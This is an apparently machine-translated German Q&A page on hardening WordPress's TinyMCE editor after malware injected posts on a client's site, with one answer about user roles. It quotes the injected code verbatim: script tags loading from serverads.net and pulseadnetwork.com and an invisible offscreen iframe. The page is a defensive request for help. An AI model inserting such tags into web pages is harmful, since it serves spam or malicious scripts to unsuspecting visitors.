wake-up-neo.net

Wie deaktiviere/verbiete ich <script> und <iframe> Tags in TinyMCE?

Einem meiner Kunden wurden gerade 200 Posts mit böswilligen Skripten und Iframes hinzugefügt. Die Website ist jetzt alle gelöscht.

Sie wurden vom Benutzer in den Inhalt eingefügt, der den Beitrag/die Seite aktualisiert, da der Computer meines Clients infiziert wurde. (Allerdings nur im TinyMCE-Editor - keines der anderen benutzerdefinierten Felder, die einer bestimmten Seite/einem bestimmten Beitrag zugewiesen sind)

Die genauen Skripte für diese Website sahen wie folgt aus:

<script src="//serverads.net/599b47260394deb2d8.js"></script>
<script src="//pulseadnetwork.com/a/display.php?r=1131815"></script>
<script src="http://serverads.net/addons/lnkr5.min.js" type="text/javascript"></script>

Die iframes sahen so aus:

<iframe style="position: absolute; left: -1000px; top: -1000px; width: 1px; height: 1px; visibility: hidden; border: none; background-color: transparent;" src="//pulseadnetwork.com/pix.html"></iframe>

Ist es möglich, Skripte und Iframes, die in TinyMCE in WordPress abgelegt sind, vollständig zu deaktivieren/zu verbieten, um dies in Zukunft zu verhindern?

WordPres-Version: 4.4.2

Und ja, ich weiß - dadurch wird der Computer meines Kunden nicht repariert. Ich hoffe jedoch, dass der schädliche Code in Zukunft nicht mehr in den TinyMCE-Editor gelangen und die Website-Besucher meiner Kunden nicht mehr mit Spam versorgen kann.

2

Fügen Sie auf einfache Weise keine Inhalte hinzu, wenn Sie als Administrator angemeldet sind, sondern nur als Autor. Wenn Sie etwas extremer werden möchten, entfernen Sie die Posting-Funktionen vom Administrator. Sie sind sich nicht sicher, wo Sie dann die Slugs bearbeiten müssen, sodass eine ordnungsgemäße Berechtigungsprüfung erforderlich ist.

Dies beantwortet Ihre Frage, da Autorenbenutzer keine Skripte und Iframes zu Inhalten hinzufügen dürfen, aber ..... wenn der Computer der Person mit den Administratorrechten nicht sicher ist, sind Sie zum Scheitern verurteilt, was immer Sie als Hacker tun können das Login, um sich selbst die Berechtigungen zu geben, die er möchte, selbst wenn er nur die DB-Ebene ändert, ohne über das WP APIS zu gehen.

2
Mark Kaplun